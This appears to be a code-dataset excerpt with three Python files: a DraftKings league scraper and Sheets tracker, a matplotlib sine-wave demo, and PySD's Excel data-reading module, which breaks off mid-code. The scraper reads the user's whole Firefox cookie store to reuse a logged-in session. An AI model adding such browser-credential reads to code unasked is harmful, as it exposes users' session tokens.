self.username = username if username else os.getenv('DK_USERNAME')
self.s = HTMLSession()
self.s.headers.update({
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36',
'DNT': '1',
'Accept': '*/*',
'Origin': 'https://www.draftkings.com',
'Sec-Fetch-Site': 'same-site',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Dest': 'empty',
'Referer': 'https://www.draftkings.com/',
'Accept-Language': 'en-US,en;q=0.9,ar;q=0.8',
})
self.cj = browser_cookie3.firefox()
@property
def api_url(self):
return 'https://api.draftkings.com/'
@property
def base_params(self):
return {'format': 'json'}
def _embed_params(self, embed_type):
return dict(**self.base_params, **{'embed': embed_type})
def contest_leaderboard(self, contest_id):
"""Gets contest leaderboard"""
url = self.api_url + f'scores/v1/megacontests/{contest_id}/leaderboard'
params = self._embed_params('leaderboard')
return self.get_json(url, params=params)
def contest_lineup(self, draftgroup_id, entry_key):
"""Gets contest lineup
Args:
draftgroup_id (int): the draftgroupId
entry_key (int): the id for the user's entry into the contest
can find entryKey in the leaderboard resource
Returns:
dict
"""
url = self.api_url + f'scores/v2/entries/{draftgroup_id}/{entry_key}'
params = self._embed_params('roster')
return self.get_json(url, params=params)
def get_json(self, url, params, headers=None, response_object=False):
"""Gets json resource"""
headers = headers if headers else {}
r = self.s.get(url, params=params, headers=headers, cookies=self.cj)
if response_object:
return r
try:
return r.json()
except:
return r.content()
def historical_contests(self, limit=50, offset=0):
"""Gets historical contests"""
url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}/historical'
extra_params = {'limit': limit, 'offset': offset}
params = dict(**self.base_params, **extra_params)
return self.get_json(url, params=params)
def historical_contests_user(self):
"""Gets user historical results"""
url = self.api_url + f'scores/v1/entries/user/{self.username}/historical'
extra_params = {'contestSetKey': self.league_key, 'contestSetType': 'league'}
params = dict(**self.base_params, **extra_params)
return self.get_json(url, params=params)
def live_contests(self):
pass
#url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}'
#params = self.base_params
#return self.get_json(url, params=params)
def league_metadata(self):
"""Gets league metadata"""
url = self.api_url + f'leagues/v2/leagues/{self.league_key}'
params = self.base_params
return self.get_json(url, params=params)
def upcoming_contests(self):
"""Gets upcoming contests"""
url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}'
params = self.base_params
return self.get_json(url, params=params)
class Parser:
"""Parses league results"""
def __init__(self, league_key=None, username=None):
"""Creates instance
Args:
league_key (str): id for home league
username (str): your username
Returns:
Parser
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self.league_key = league_key if league_key else os.getenv('DK_LEAGUE_KEY')
self.username = username if username else os.getenv('DK_USERNAME')
def _to_dataframe(self, container):
"""Converts container to dataframe"""
return pd.DataFrame(container)
def _to_obj(self, pth):
"""Reads json text in pth and creates python object"""
if isinstance(pth, str):
pth = Path(pth)
return json.loads(pth.read_text())
def contest_entry(self, data):
"""Parses contest entry
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['draftGroupId', 'contestKey', 'entryKey', 'lineupId', 'userName',
'userKey', 'timeRemaining', 'rank', 'fantasyPoints']
player_wanted = ['displayName', 'rosterPosition', 'percentDrafted', 'draftableId', 'score',
'statsDescription', 'timeRemaining']
entry = data['entries'][0]
d = {k: entry[k] for k in wanted}
d['players'] = []
for player in entry['roster']['scorecards']:
d['players'].append({k: player[k] for k in player_wanted})
return d
def contest_leaderboard(self, data):
"""Parses contest leaderboard
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['userName', 'userKey', 'draftGroupId', 'contestKey', 'entryKey', 'rank', 'fantasyPoints']
return [{k: item.get(k) for k in wanted} for item in data['leaderBoard']]
def historical_contests(self, data):
"""Parses historical league contests
Args:
data (dict): parsed JSON
Returns:
list: of contest dict
"""
vals = []
wanted = ['contestStartTime', 'gameSetKey', 'contestKey', 'name', 'draftGroupId',
'entries', 'maximumEntries', 'maximumEntriesPerUser', 'entryFee', 'contestState']
for contest in data['contests']:
d = {k: contest[k] for k in wanted}
attrs = contest['attributes']
if attrs.get('Root Recurring Contest ID'):
d['recurringContestId'] = attrs.get('Root Recurring Contest ID')
vals.append(d)
return vals
def historical_contests_user(self, data):
"""Parses historical contests for user in league
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['draftGroupId', 'contestKey', 'entryKey', 'userName', 'userKey', 'rank', 'fantasyPoints',
'fantasyPointsOpponent', 'userNameOpponent']
return [{k: item[k] for k in wanted} for item in data['entries']]
def league_members(self, data):
"""Gets league members
Example URL: https://api.draftkings.com/leagues/v2/leagues/67ymkfy8
Args:
data (dict): parsed JSON
Returns:
list: of str
"""
return [item['username'] for item in data['league']['members']]
def league_metadata(self, data):
"""Gets league metadata
Example URL: https://api.draftkings.com/leagues/v2/leagues/67ymkfy8
Args:
data (dict): parsed JSON
Returns:
dict: with user details
"""
d = {}
league = data['league']
d['league_name'] = league['name']
d['league_key'] = league['key']
d['league_commissioner'] = league['creatorUsername']
d['members'] = {item['username']: item['userKey'] for item in league['members']}
return d
def live_contests(self, data):
# TODO: this may same as upcoming_contests, then filter on contestState
pass
def upcoming_contests(self, data):
contests = data['contests']
wanted = ['name', 'contestKey', 'draftGroupId', 'entries', 'contestStartTime', 'contestState']
return [{k: contest[k] for k in wanted} for contest in contests]
class Tracker:
"""Track league results with Google Sheets
The sheet is set up with the week in Column A and one column per league user from Column B onward.
Each row is a weekly result starting with the week number.
"""
def __init__(self, sskey=None, json_secret_fn=None, sheet_id=0):
"""Creates instance
Args:
sskey (str): key for worksheet
json_secret_fn (str): fn with authentication secrets
sheet_id (int): id for individual sheet
Returns:
Tracker
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self._colmap = None
self.app = pdsheet.get_app(json_secret_fn)
self.sskey = sskey if sskey else os.getenv('DK_LEAGUE_SPREADSHEET')
self.sheet_id = sheet_id
@property
def column_map(self):
"""Gets map of league members -> column number (A=1, etc.)"""
if not self._colmap:
ws = pdsheet.get_worksheet(self.sskey)
s = ws.get_sheet_by_id(self.sheet_id)
rng = s.get_data_range()
headers = rng.get_values()[0]
self._colmap = {user:idx for idx, user in enumerate(headers)}
return self._colmap
def add_week_results(self, week, results):
"""Adds week results to sheet
Args:
week (int): the week
results (dict): key is username, value is score
"""
# get the sheet
ws = pdsheet.get_worksheet(self.app, self.sskey)
s = ws.get_sheet_by_id(self.sheet_id)
# figure out the last row
rng = s.get_data_range()
newrow_index = rng.coordinates.number_of_row + 1
# now loop through the results and add to sheet
colmap = self.column_map
for k,v in results.items():
colnum = colmap.get(k)
if colnum:
cell = s.get_range(newrow_index, colnum, 1, 1)
cell.set_value(v)
def get_week_results(self, week):
"""Gets week results from sheet
Args:
week (int): the week of results
"""
ws = pdsheet.get_worksheet(self.app, self.sskey)
s = ws.get_sheet_by_id(self.sheet_id)
rng = s.get_data_range()
rows = rng.get_values()
headers = rows.pop(0)
for row in rows:
if row[0] == week:
return dict(zip(headers, row))
return None
def summary(self):
"""Creates summary table of results"""
pass
if __name__ == '__main__':
pass
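A usage sketch tying Scraper and Parser together; it assumes the DK_LEAGUE_KEY and DK_USERNAME environment variables read by the constructors are set and that DraftKings cookies are available from a logged-in Firefox session.
scraper = Scraper()
parser = Parser()

# Fetch the last ten league contests and print their names and keys.
raw = scraper.historical_contests(limit=10)
for contest in parser.historical_contests(raw):
    print(contest['name'], contest['contestKey'])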
| 33.250746
| 133
| 0.586767
| 1,301
| 11,139
| 4.883167
| 0.216756
| 0.026916
| 0.018417
| 0.014324
| 0.33858
| 0.320006
| 0.299701
| 0.277979
| 0.260507
| 0.252322
| 0
| 0.007787
| 0.296705
| 11,139
| 334
| 134
| 33.350299
| 0.803166
| 0.212946
| 0
| 0.213018
| 0
| 0.005917
| 0.191497
| 0.04586
| 0
| 0
| 0
| 0.002994
| 0
| 1
| 0.16568
| false
| 0.023669
| 0.047337
| 0.017751
| 0.372781
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60b401f8d464942d7d88868c9047da1188916d43
| 246
|
py
|
Python
|
Graphing/Example1.py
|
Wadden12/Semester1
|
a13c4486848daec3b5865e8a2a778689c81528fe
|
[
"Apache-2.0"
] | null | null | null |
Graphing/Example1.py
|
Wadden12/Semester1
|
a13c4486848daec3b5865e8a2a778689c81528fe
|
[
"Apache-2.0"
] | null | null | null |
Graphing/Example1.py
|
Wadden12/Semester1
|
a13c4486848daec3b5865e8a2a778689c81528fe
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python3
import numpy as np
import matplotlib.pyplot as plt
t = np.arange(0.0, 3.0, 0.01)
s = np.sin(2.5 * np.pi * t)
plt.plot(t, s)
plt.xlabel('time (s)')
plt.ylabel('voltage (mV)')
plt.title('Sine Wave')
plt.grid(True)
plt.show()
| 15.375
| 31
| 0.646341
| 50
| 246
| 3.18
| 0.64
| 0.025157
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.047393
| 0.142276
| 246
| 16
| 32
| 15.375
| 0.706161
| 0.069106
| 0
| 0
| 0
| 0
| 0.126638
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60bc8d5255a0bd875f4af98e1eec0327e1d5bb7e
| 34,771
|
py
|
Python
|
pysd/py_backend/external.py
|
rogersamso/pysd_dev
|
85606265aa92878c35a41dd81ce9588d23350e19
|
[
"MIT"
] | null | null | null |
pysd/py_backend/external.py
|
rogersamso/pysd_dev
|
85606265aa92878c35a41dd81ce9588d23350e19
|
[
"MIT"
] | 1
|
2021-05-25T16:34:10.000Z
|
2021-05-25T16:34:10.000Z
|
pysd/py_backend/external.py
|
rogersamso/pysd_dev
|
85606265aa92878c35a41dd81ce9588d23350e19
|
[
"MIT"
] | null | null | null |
"""
These classes are a collection of the needed tools to read external data.
The External type objects created by these classes are initialized before
the Stateful objects by functions.Model.initialize.
"""
import re
import os
import warnings
import pandas as pd # TODO move to openpyxl
import numpy as np
import xarray as xr
from openpyxl import load_workbook
from . import utils
class Excels():
"""
Class to save the read Excel files and thus avoid double reading
"""
_Excels, _Excels_opyxl = {}, {}
@classmethod
def read(cls, file_name, sheet_name):
"""
Read the Excel file or return the previously read one
"""
if file_name + sheet_name in cls._Excels:
return cls._Excels[file_name + sheet_name]
else:
excel = np.array([
pd.to_numeric(ex, errors='coerce')
for ex in
pd.read_excel(file_name, sheet_name, header=None).values
])
cls._Excels[file_name + sheet_name] = excel
return excel
@classmethod
def read_opyxl(cls, file_name):
"""
Read the Excel file using OpenPyXL or return the previously read one
"""
if file_name in cls._Excels_opyxl:
return cls._Excels_opyxl[file_name]
else:
excel = load_workbook(file_name, read_only=True, data_only=True)
cls._Excels_opyxl[file_name] = excel
return excel
@classmethod
def clean(cls):
"""
Clean the dictionary of read files
"""
cls._Excels, cls._Excels_opyxl = {}, {}
class External(object):
"""
Main class of external objects
Attributes
----------
py_name: str
The python name of the object
missing: str ("warning", "error", "ignore", "keep")
What to do with missing values. If "warning" (default)
shows a warning message and interpolates the values.
If "raise" raises an error. If "ignore" interpolates
the values without showing anything. If "keep" it will keep
the missing values, this option may cause the integration to
fail, but it may be used to check the quality of the data.
file: str
File name from which the data is read.
sheet: str
Sheet name from which the data is read.
"""
missing = "warning"
def __init__(self, py_name):
self.py_name = py_name
self.file = None
self.sheet = None
def __str__(self):
return self.py_name
def _get_data_from_file(self, rows, cols):
"""
Function to read data from excel file using rows and columns
Parameters
----------
rows: list of len 2
first row and last row+1 to be read, starting from 0
cols: list of len 2
first col and last col+1 to be read, starting from 0
Returns
-------
data: pandas.DataFrame, pandas.Series or float
depending on the shape of the requested data
"""
# TODO move to openpyxl to avoid pandas dependency in this file.
ext = os.path.splitext(self.file)[1].lower()
if ext in ['.xls', '.xlsx']:
# read data
data = Excels.read(
self.file,
self.sheet)[rows[0]:rows[1], cols[0]:cols[1]].copy()
shape = data.shape
# if it is a single row remove its dimension
if shape[1] == 1:
data = data[:, 0]
if shape[0] == 1:
data = data[0]
return data
raise NotImplementedError(self.py_name + "\n"
+ "The files with extension "
+ ext + " are not implemented")
def _get_data_from_file_opyxl(self, cellname):
"""
Function to read data from excel file using cell range name
Parameters
----------
cellname: str
the cell range name
Returns
-------
data: numpy.ndarray or float
depending on the shape of the requested data
"""
# read data
excel = Excels.read_opyxl(self.file)
try:
# Get the local id of the sheet
# needed for searching in locals names
# need to lower the sheetnames as Vensim has no case sensitivity
sheetId = [sheetname_wb.lower() for sheetname_wb
in excel.sheetnames].index(self.sheet.lower())
except ValueError:
# Error if it is not able to get the localSheetId
raise ValueError(self.py_name + "\n"
+ "The sheet doesn't exist...\n"
+ self._file_sheet)
try:
# Search for local and global names
cellrange = excel.defined_names.get(cellname, sheetId)\
or excel.defined_names.get(cellname)
coordinates = cellrange.destinations
for sheet, cells in coordinates:
if sheet.lower() == self.sheet.lower():
values = excel[sheet][cells]
try:
return np.array(
[[i.value if not isinstance(i.value, str)
else np.nan for i in j] for j in values],
dtype=float)
except TypeError:
return float(values.value)
raise AttributeError
except (KeyError, AttributeError):
# key error if the cellrange doesn't exist in the file or sheet
raise AttributeError(
self.py_name + "\n"
+ "The cell range name:\t {}\n".format(cellname)
+ "Doesn't exist in:\n" + self._file_sheet
)
def _get_series_data(self, series_across, series_row_or_col, cell, size):
"""
Function that reads series and data from the Excel file for
DATA and LOOKUPS.
Parameters
----------
series_across: "row", "column" or "name"
The way to read series file.
series_row_or_col: int or str
If series_across is "row" the row number where the series data is.
If series_across is "column" the column name where
the series data is.
If series_across is "name" the cell range name where
the series data is.
cell:
If series_across is not "name, the top left cell where
the data table starts.
Else the name of the cell range where the data is.
size:
The size of the 2nd dimension of the data.
Returns
-------
series, data: ndarray (1D), ndarray(1D/2D)
The values of the series and data.
"""
if series_across == "row":
# Horizontal data (dimension values in a row)
# get the dimension values
first_row, first_col = self._split_excel_cell(cell)
series = self._get_data_from_file(
rows=[int(series_row_or_col)-1, int(series_row_or_col)],
cols=[first_col, None])
# read data
data = self._get_data_from_file(
rows=[first_row, first_row + size],
cols=[first_col, None]).transpose()
elif series_across == "column":
# Vertical data (dimension values in a column)
# get the dimension values
first_row, first_col = self._split_excel_cell(cell)
series_col = self._col_to_num(series_row_or_col)
series = self._get_data_from_file(
rows=[first_row, None],
cols=[series_col, series_col+1])
# read data
data = self._get_data_from_file(
rows=[first_row, None],
cols=[first_col, first_col + size])
else:
# get series data
series = self._get_data_from_file_opyxl(series_row_or_col)
if isinstance(series, float):
series = np.array([[series]])
series_shape = series.shape
if series_shape[0] == 1:
# horizontal definition of lookup/time dimension
series = series[0]
transpose = True
elif series_shape[1] == 1:
# vertical definition of lookup/time dimension
series = series[:, 0]
transpose = False
else:
# Error if the lookup/time dimension is 2D
raise ValueError(
self.py_name + "\n"
+ "Dimension given in:\n"
+ self._file_sheet
+ "\tDimentime_missingsion name:"
+ "\t{}\n".format(series_row_or_col)
+ " is a table and not a vector"
)
# get data
data = self._get_data_from_file_opyxl(cell)
if isinstance(data, float):
data = np.array([[data]])
if transpose:
# transpose for horizontal definition of dimension
data = data.transpose()
if data.shape[0] != len(series):
raise ValueError(
self.py_name + "\n"
+ "Dimension and data given in:\n"
+ self._file_sheet
+ "\tDimension name:\t{}\n".format(series_row_or_col)
+ "\tData name:\t{}\n".format(cell)
+ " don't have the same length in the 1st dimension"
)
if data.shape[1] != size:
# Given coordinates length is different than
# the length of the 2nd dimension
raise ValueError(
self.py_name + "\n"
+ "Data given in:\n"
+ self._file_sheet
+ "\tData name:\t{}\n".format(cell)
+ " has not the same size as the given coordinates"
)
if data.shape[1] == 1:
# remove second dimension of data if its shape is (N, 1)
data = data[:, 0]
return series, data
def _resolve_file(self, root=None, possible_ext=None):
possible_ext = possible_ext or\
['', '.xls', '.xlsx', '.odt', '.txt', '.tab']
if self.file[0] == '?':
self.file = os.path.join(root, self.file[1:])
if not os.path.isfile(self.file):
for ext in possible_ext:
if os.path.isfile(self.file + ext):
self.file = self.file + ext
return
# raise FileNotFoundError(self.file)
# python2 compatibility
raise IOError("File Not Found: " + self.file)
else:
return
def _initialize_data(self, element_type):
"""
Initialize one element of DATA or LOOKUPS
Parameters
----------
element_type: str
"lookup" for LOOKUPS, "data" for data.
Returns
-------
data: xarray.DataArray
Dataarray with the time or interpolation dimension
as first dimension.
"""
self._resolve_file(root=self.root)
series_across = self._series_selector(self.x_row_or_col, self.cell)
size = utils.compute_shape(self.coords, reshape_len=1,
py_name=self.py_name)[0]
series, data = self._get_series_data(
series_across=series_across,
series_row_or_col=self.x_row_or_col,
cell=self.cell, size=size
)
# remove nan or missing values from dimension
if series_across != "name":
# Remove last nans only if the method is to read by row or col
i = 0
try:
while np.isnan(series[i-1]):
i -= 1
except IndexError:
# series has len 0
raise ValueError(
self.py_name + "\n"
+ "Dimension given in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " has length 0"
)
if i != 0:
series = series[:i]
data = data[:i]
# warning/error if missing data in the series
if any(np.isnan(series)) and self.missing != "keep":
valid_values = ~np.isnan(series)
series = series[valid_values]
data = data[valid_values]
if self.missing == "warning":
warnings.warn(
self.py_name + "\n"
+ "Dimension value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " the corresponding data value(s) to the "
+ "missing/non-valid value(s) will be ignored\n\n"
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Dimension value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
)
# Check if the lookup/time dimension is strictly monotonous
if np.any(np.diff(series) <= 0) and self.missing != "keep":
raise ValueError(self.py_name + "\n"
+ "Dimension given in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " is not strictly monotonous")
# Check for missing values in data
if np.any(np.isnan(data)) and self.missing != "keep":
if series_across == "name":
cell_type = "Cellrange"
else:
cell_type = "Reference cell"
if self.missing == "warning":
# Fill missing values with the chosen interpolation method
# what Vensim does during running for DATA
warnings.warn(
self.py_name + "\n"
+ "Data value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
+ " the corresponding value will be filled "
+ "with the interpolation method of the object.\n\n"
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Data value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
# fill values
self._fill_missing(series, data)
reshape_dims = tuple([len(series)] + utils.compute_shape(self.coords))
if len(reshape_dims) > 1:
data = self._reshape(data, reshape_dims)
if element_type == "lookup":
dim_name = "lookup_dim"
else:
dim_name = "time"
data = xr.DataArray(
data=data,
coords={dim_name: series, **self.coords},
dims=[dim_name] + list(self.coords)
)
return data
def _fill_missing(self, series, data):
"""
Fills missing values in excel read data. Mutates the values in data.
Parameters
----------
series:
the time series without missing values
data:
the data with missing values
Returns
-------
None
"""
# if data is 2dims we need to interpolate
datanan = np.isnan(data)
if len(data.shape) == 1:
data[datanan] = self._interpolate_missing(
series[datanan],
series[~datanan],
data[~datanan])
else:
for i, nanlist in enumerate(list(datanan.transpose())):
data[nanlist, i] = self._interpolate_missing(
series[nanlist],
series[~nanlist],
data[~nanlist][:, i])
def _interpolate_missing(self, x, xr, yr):
"""
Interpolates a list of missing values from _fill_missing
Parameters
----------
x:
list of missing values to interpolate
xr:
non-missing x values
yr:
non-missing y values
Returns
-------
y:
Result after interpolating x with self.interp method
"""
y = np.empty_like(x, dtype=float)
for i, value in enumerate(x):
if self.interp == "raw":
y[i] = np.nan
elif value >= xr[-1]:
y[i] = yr[-1]
elif value <= xr[0]:
y[i] = yr[0]
elif self.interp == 'look forward':
y[i] = yr[xr >= value][0]
elif self.interp == 'hold backward':
y[i] = yr[xr <= value][-1]
else:
y[i] = np.interp(value, xr, yr)
return y
@property
def _file_sheet(self):
"""
Returns file and sheet name in a string
"""
return "\tFile name:\t{}\n".format(self.file)\
+ "\tSheet name:\t{}\n".format(self.sheet)
@staticmethod
def _col_to_num(col):
"""
Transforms the column name to int
Parameters
----------
col: str
Column name
Returns
-------
int
Column number
"""
if len(col) == 1:
return ord(col.upper()) - ord('A')
elif len(col) == 2:
left = ord(col[0].upper()) - ord('A') + 1
right = ord(col[1].upper()) - ord('A')
return left * (ord('Z')-ord('A')+1) + right
else:
left = ord(col[0].upper()) - ord('A') + 1
center = ord(col[1].upper()) - ord('A') + 1
right = ord(col[2].upper()) - ord('A')
return left * ((ord('Z')-ord('A')+1)**2)\
+ center * (ord('Z')-ord('A')+1)\
+ right
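# Editor's illustration (standalone sketch, not part of the class above):
# _col_to_num maps Excel column names to 0-based indices by treating the
# letters as base-26 digits, so "A" -> 0, "Z" -> 25, "AA" -> 26, "AC" -> 28.
# A loop-based re-derivation of the same mapping:
def col_to_num_sketch(col):
    num = 0
    for letter in col.upper():
        num = num * 26 + (ord(letter) - ord('A') + 1)
    return num - 1

assert col_to_num_sketch("A") == 0
assert col_to_num_sketch("Z") == 25
assert col_to_num_sketch("AA") == 26
assert col_to_num_sketch("AC") == 28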
def _split_excel_cell(self, cell):
"""
Splits a cell value given in a string.
Returns None for non-valid cell formats.
Parameters
----------
cell: str
Cell-like string, such as "A1", "b16" or "AC19".
If it is not a cell-like string, None is returned.
Returns
-------
row number, column number: int, int
If the cell input is valid. Both numbers are given in Python
enumeration, i.e., first row and first column are 0.
"""
split = re.findall(r'\d+|\D+', cell)
try:
# check that we only have two values [column, row]
assert len(split) == 2
# check that the column name has no special characters
assert not re.compile('[^a-zA-Z]+').search(split[0])
# check that row number is not 0
assert int(split[1]) != 0
# the column name has at most 3 letters
assert len(split[0]) <= 3
return int(split[1])-1, self._col_to_num(split[0])
except AssertionError:
return
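# Editor's illustration (standalone sketch, not part of the class above):
# the regex r'\d+|\D+' used by _split_excel_cell separates the letter run
# from the digit run, and the method converts both to 0-based indices.
import re
print(re.findall(r'\d+|\D+', "AC19"))  # ['AC', '19']
# A valid call like _split_excel_cell("AC19") therefore returns (18, 28):
# row 19 -> index 18 and column "AC" -> index 28. Inputs such as "time" or
# "A0" fail one of the assertions above and make the method return None.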
@staticmethod
def _reshape(data, dims):
"""
Reshapes a pandas.DataFrame, pandas.Series, xarray.DataArray
or np.ndarray in the given dimensions.
Parameters
----------
data: xarray.DataArray/numpy.ndarray
Data to be reshaped
dims: tuple
The dimensions to reshape.
Returns
-------
numpy.ndarray
reshaped array
"""
try:
data = data.values
except AttributeError:
pass
return data.reshape(dims)
def _series_selector(self, x_row_or_col, cell):
"""
Selects whether series data (DATA/LOOKUPS) should be read by column,
by row or by cellrange name, based on the input format of x_row_or_col
and cell. The format of the two variables must be consistent.
Parameters
----------
x_row_or_col: str
String of a number if the series is given in a row, a letter if it is
given in a column, or a name if it is given by cellrange name.
cell: str
Cell identifier, such as "A1", or a name if the data is given
by cellrange name.
Returns
-------
series_across: str
"row" if series is given in a row
"column" if series is given in a column
"name" if series and data are given by range name
"""
try:
# if x_row_or_col is numeric the series must be a row
int(x_row_or_col)
return "row"
except ValueError:
if self._split_excel_cell(cell):
# if the cell can be split, the format is "A1"-like,
# so the series must be a column
return "column"
else:
return "name"
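# Editor's illustration (standalone sketch, not part of the class above):
# a compact approximation of the three-way decision in _series_selector.
# The real method delegates the cell check to _split_excel_cell; here a
# simple regex stands in for it (letters, at most 3, then a non-zero row).
import re

def series_selector_sketch(x_row_or_col, cell):
    try:
        int(x_row_or_col)
        return "row"
    except ValueError:
        if re.fullmatch(r'[A-Za-z]{1,3}[1-9]\d*', cell):
            return "column"
        return "name"

assert series_selector_sketch("4", "C5") == "row"
assert series_selector_sketch("time", "B17") == "column"
assert series_selector_sketch("time_name", "data_cells") == "name"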
class ExtData(External):
"""
Class for Vensim GET XLS DATA/GET DIRECT DATA
"""
def __init__(self, file_name, sheet, time_row_or_col, cell,
interp, coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.time_row_or_cols = [time_row_or_col]
self.cells = [cell]
self.coordss = [coords]
self.root = root
self.interp = interp
# check if the interpolation method is valid
if not interp:
self.interp = "interpolate"
if self.interp not in ["interpolate", "raw",
"look forward", "hold backward"]:
raise ValueError(self.py_name + "\n"
+ " The interpolation method (interp) must be "
+ "'raw', 'interpolate', "
+ "'look forward' or 'hold backward'")
def add(self, file_name, sheet, time_row_or_col, cell,
interp, coords):
"""
Add information to retrieve a new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.time_row_or_cols.append(time_row_or_col)
self.cells.append(cell)
self.coordss.append(coords)
if not interp:
interp = "interpolate"
if interp != self.interp:
raise ValueError(self.py_name + "\n"
+ "Error matching interpolation method with "
+ "previously defined one")
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.time_row_or_cols,
self.cells, self.coordss)
for (self.file, self.sheet, self.x_row_or_col,
self.cell, self.coords) in zipped:
data.append(self._initialize_data("data"))
self.data = utils.xrmerge(data)
def __call__(self, time):
if time in self.data['time'].values:
outdata = self.data.sel(time=time)
elif self.interp == "raw":
return np.nan
elif time > self.data['time'].values[-1]:
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the time")
outdata = self.data[-1]
elif time < self.data['time'].values[0]:
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the time")
outdata = self.data[0]
elif self.interp == "interpolate":
outdata = self.data.interp(time=time)
elif self.interp == 'look forward':
outdata = self.data.sel(time=time, method="backfill")
elif self.interp == 'hold backward':
outdata = self.data.sel(time=time, method="pad")
if self.coordss[0]:
# Remove time coord from the DataArray
return outdata.reset_coords('time', drop=True)
else:
# if data has no-coords return a float
return float(outdata)
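# Editor's illustration (standalone sketch, not part of the classes above):
# ExtData.__call__ resolves a requested time against the 'time' coordinate.
# The same xarray calls on a hand-built DataArray show what each branch does
# (xarray's interp relies on scipy being installed).
import xarray as xr

demo = xr.DataArray([1.0, 2.0, 4.0], coords={"time": [0, 5, 10]}, dims=["time"])
print(float(demo.sel(time=5)))                       # exact match        -> 2.0
print(float(demo.interp(time=7.5)))                  # "interpolate"      -> 3.0
print(float(demo.sel(time=7.5, method="backfill")))  # "look forward"     -> 4.0
print(float(demo.sel(time=7.5, method="pad")))       # "hold backward"    -> 2.0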
class ExtLookup(External):
"""
Class for Vensim GET XLS LOOKUPS/GET DIRECT LOOKUPS
"""
def __init__(self, file_name, sheet, x_row_or_col, cell,
coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.x_row_or_cols = [x_row_or_col]
self.cells = [cell]
self.root = root
self.coordss = [coords]
self.interp = "interpolate"
def add(self, file_name, sheet, x_row_or_col, cell, coords):
"""
Add information to retrieve a new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.x_row_or_cols.append(x_row_or_col)
self.cells.append(cell)
self.coordss.append(coords)
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.x_row_or_cols,
self.cells, self.coordss)
for (self.file, self.sheet, self.x_row_or_col,
self.cell, self.coords) in zipped:
data.append(self._initialize_data("lookup"))
self.data = utils.xrmerge(data)
def __call__(self, x):
return self._call(self.data, x)
def _call(self, data, x):
if isinstance(x, xr.DataArray):
if not x.dims:
# shape 0 xarrays
return self._call(data, float(x))
if np.all(x > data['lookup_dim'].values[-1]):
outdata, _ = xr.broadcast(data[-1], x)
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the series")
elif np.all(x < data['lookup_dim'].values[0]):
outdata, _ = xr.broadcast(data[0], x)
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the series")
else:
data, _ = xr.broadcast(data, x)
outdata = data[0].copy()
for a in utils.xrsplit(x):
outdata.loc[a.coords] = self._call(data.loc[a.coords],
float(a))
# the output will be always an xarray
return outdata.reset_coords('lookup_dim', drop=True)
else:
if x in data['lookup_dim'].values:
outdata = data.sel(lookup_dim=x)
elif x > data['lookup_dim'].values[-1]:
outdata = data[-1]
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the series")
elif x < data['lookup_dim'].values[0]:
outdata = data[0]
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the series")
else:
outdata = data.interp(lookup_dim=x)
# the output could be a float or an xarray
if self.coordss[0]:
# Remove lookup dimension coord from the DataArray
return outdata.reset_coords('lookup_dim', drop=True)
else:
# if lookup has no-coords return a float
return float(outdata)
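# Editor's illustration (standalone sketch, not part of the classes above):
# the scalar branch of ExtLookup._call clamps out-of-range inputs to the
# first/last point of the series and interpolates in between, as here:
import xarray as xr

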